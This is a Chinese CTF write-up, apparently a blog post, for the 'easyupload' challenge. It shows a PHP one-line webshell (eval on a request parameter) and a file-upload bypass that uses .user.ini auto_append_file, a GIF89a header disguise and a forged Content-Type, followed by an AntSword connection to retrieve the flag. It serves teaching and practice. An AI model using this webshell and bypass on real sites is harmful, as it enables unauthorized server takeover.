攻防世界easyupload

一进来就是文件上传,但是试了一下直接传一句话木马文件没用,看其他的解题思路发现是上传的内容不能有php字符。了解到用到.user.ini 绕过

.

.user.ini中两个中的配置就是auto_prepend_file和auto_append_file。意思是指定一个文件,那么该文件就会被包含在要执行的php文件中(如index.php)。例如:auto_append_file=opium.jpg

 所以首先我们得到本地新建一个.user.ini文件和包含木马的a.jpg文件,因为木马中不能有php字符,所以一句话木马可以为<?=eval($_REQUEST['cmd']);?>,然后还要在两个文件中都写上GIF89a

GIF89a图片头文件欺骗,是一种攻击,让文件伪装成图片格式。

.user.ini文件内容:

 

 

 a.jpg文件内容:

 然后上传.user.ini再用bp抓包修改content-type为image/jpg,再放包

然后页面成功回显,显示上传成功,接着就再上传a.jpg。

 

然后就在bp放包放到下面这个a.jpg的页面出现为止,接着就再放一次包。

回到页面成功回显,上传成功。接着F12查看网络,然后找到图中红线标的url。

 

接着就用蚁剑连接,输入密码cmd。

 然后在目录中找到flag文件,得知flag:cyberpeace{3cbbd321de99c11d5fe8f17ccddf3b44} 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值